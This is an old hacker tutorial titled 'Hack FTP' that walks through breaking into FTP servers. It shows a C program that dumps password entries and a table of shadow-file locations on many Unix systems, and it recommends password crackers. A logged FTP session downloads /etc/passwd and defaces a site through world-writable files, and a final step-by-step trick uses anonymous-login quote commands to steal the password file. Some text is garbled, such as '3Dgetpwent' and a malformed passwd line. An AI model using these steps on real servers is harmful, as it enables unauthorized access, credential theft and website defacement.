Hack FTP

Note: First of all, this is not written by us. I don't know who did. If you wrote it, please, contact me and I will gladly give you full credit for it.

Intro- FTP (File Transfer Protocol) is used by almost every commercial web hosting company 
because it allows its users to update their sites. It requires clear text (unencrypted) 
logins and passwords; allowing key stroke loggers to grab usernames and passwords. 

Legal-
A. Disclaimer-I am *NOT* responsible for what you do with the information in this text 
file. This is for educational purposes only.
B. You may distribute this freely as long as it is kept in full tact and credit is given 
to encrypt0.

Begin

Technique #1

An example of an encrypted password file is:

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

The Superuser is the part that gives you root. That's the main part of the file.

Below is a shadowed passowrd file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

Shadowed password files don't let you view or copy the actual encrypted password. This 
causes problems for the password cracker and dictionary maker. Below is another example 
of a shadowed password file:


root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed passowrd files have an "x" or "*" in place of the password.

Now that we can get and indnetify the password file, lets work on cracking it.
The first step that you would take is to download or copy the file. The second step is 
to find a password cracker and a dictionary maker. Although it's nearly impossible to 
find a good cracker there are a few ok ones out there. I recomend that you look for 
Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a 
dictionary maker or a dictionary file... When you start a cracking prog you will be 
asked to find the the password file. That's where a dictionary maker comes in. You can 
download one from nearly every hacker page on the net. A dictionary maker finds all 
the possible letter combinations with the alphabet that you choose(ASCII, caps, 
lowercase, and numeric letters may also be added). 

On many but not all systems the following program can crack a shadowed password file.

---(snip)---

#include <pwd.h>
main()
{
struct passwd *p;
while(p=3Dgetpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,
p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir,
p->pw_shell);
}

---(snip)---

Another and probably easier way is to find the backup of the shadowed password file:

Unix Path needed token
AIX 3 /etc/security/passwd !
/tcb/auth/files/ <first letter of username> #
/<username>

A/UX 3.0s /tcb/files/auth/?/ *

BSD4.3-Reno /etc/master.passwd *

ConvexOS 10 /etc/shadqw *

ConvexOS 11 /etc/shadow *

DG/UX /etc/tcb/aa/user *

EP/IX /etc/shadow X

HP-UX /.secure/etc/passwd *

IRIX 5 /etc/shadow X

Linux 1.1 /etc/shadow *

OSF/1 /etc/passwd [.dir|.pag] *

SCO Unix #.2.x /tcb/auth/files <first letter of username> *
/<username> 

SunOS4.1c+32 /etc/security/passwd/adjunct =

SunOS 5.0 /etc/shadow <optional NIS+ private secure>
maps/tables/whatever

System V Release 4.0 /etc/shadow X

System V Release 4.2 /etc/security/* database 

Ultrix 4 /etc/auth [.dir|.pag] *

UNICOS /etc/udb =20 


Now we will move on to the next technique of hacking through FTP, which involves 
downloading and uploading.

Technique#2

C:\ftp 127.0.0.1
Connected to 127.0.0.1.
220 Fake FTP server ready.
User (127.0.0.1:(none)): guest
331 Password required for guest.
Password:
230 User logged in.
ftp> pwd
257 "/usr/people/guest" is a current directory.
ftp> cd /
250 CWD command successful.
ftp> pwd
257 "/" is a current directory.
ftp> get /etc/shadow
200 PORT command successful.
550 /etc/shadow: No such file or directory.
ftp> get /etc/passwd
200 PORT command successful
ftp> get /etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for '/etc/passwd' (1145 bytes).
226 Transfer complete
ftp: 1166 bytes recieved in 0.00Seconds 1166000.00Kbytes/sec.

Notice how the password file was not shadowed. So /etc/passwd had the encrypted 
passwords in it, but can easily be run though Crack. Lets continue our FTP session.

ftp> cd /var/www/htdocs
250 CWD command successful

We now give the "ls -al" command at the webserver document root and get:

drwxrwxrwx 7 root sys 4096 Sep 9 14:38 ./ 
drwxr-xr-x 6 root sys 68 Oct 22 1998 ../
lrwxr-xr-x 1 root sys 29 Oct 22 1998 SoftWindows2 -> ../../../usr/lib/SoftWindows2/
drwxr-xr-x 14 root sys 4096 Oct 22 1998 WhatsNew/ 
lrwxr-xr-x 1 guest user 31 Sep 9 14:38 guest -> /usr/people/bob/public_html/
-rw-rw-rw- 1 root sys 2085 Oct 22 1998 default.gif
lrwxr-xr-x 1 demos demos 22 Nov 16 1998 demos -> /usr/demos/public_html/
drwxr-xr-x 2 root sys 9 Oct 22 1998 dist/
lrwxr-xr-x 1 guest guest 29 Nov 16 1998 guest -> /usr/people/guest/puclic_html/
drwxr-xr-x 2 root sys 4096 Oct 22 1998 icons/
drwxr-xr-x 2 root sys 125 Oct 22 1998 images/
-rw-r--r-- 1 root sys 754 Oct 22 1998 index.html
-rw-rw-rw- 1 root sys 765 Sep 9 14:38 userList.html
drwxr-xr-x 3 root sys 4096 Oct 22 1998 webdist/
-r--r--r-- 1 root sys 3760 Oct 22 1998 webdist.html
226 Transfer complete.
ftp: 1110 bytes recieved in 0.11Seconds 10.09 Kbytes/sec

Look at that, some word writable files(you can tell by the letter w in the second 
to last place in the code that begins each line). Index.html isn't writable, but 
look at default.gif. By clicking on on various images I find out that default.gif 
is the icon for the guest account. I download default.gif and play with it, then 
upload the new version.

So here we upload hacked gif to the site via FTP:

ftp> put default.gif
200 PORT command successful.
150 Opening ASCII mode data connection for 'default.gif'.
226 Transfer complete.
ftp: 1450 bytes sent in 0.00Seconds 1450000.00Kbytes/sec.

I determine that I successfully uploaded my hacked image. However, it didn't have 
the desired affect. Index.html is not modified. Clicking on the view image I 
discover it is in ~guest - and it isn't word writeable. 

So now we try hacking another word writable file. 

ftp> get userList.html 
200 PORT command successful.
150 Opening ASCII mode data connection for 'userList.html' (765 bytes).
226 Transfer complete.
ftp: 814 bytes recieved in 0.00Seconds 814000.00Kbytes/sec.

I edit just very slightly to point it to the image file I just defaced and put 
it back. We now have a hack. 

Technique #3

The following can be done from a shell or DOS prompt.

step1. Ok what you first do is go the run prompt
step2. Type command to get a dos command prompt 
step3. Ok type ftp server.to.hack.com 
step4. You should be prompted to login just hit enter without typing anything
step5. You should be prompted for a password just hit enter without typing anything.
step6. Type "quote user ftp" now hit enter.
step7. type "quote cwd ~root" now hit enter.
step8. type "quote pass ftp" now hit enter.

You now have guest access and can download the password file.

step9. type "cd etc" then enter to go to the etc directory which contains the 
password file
step10. type "get passwd" hit enter this will download the password file to 
your harddrive.

Ok you now have the password file, open c:\passwd with the notepad. If it is 
encrypted crack it if not figure out some logins by guessing to guess it works 
good to finger the address then to use the information you get there to guess 
a password. Just use what you learned from technique #1 with how we cracked the 
shadowed and encrypted password files.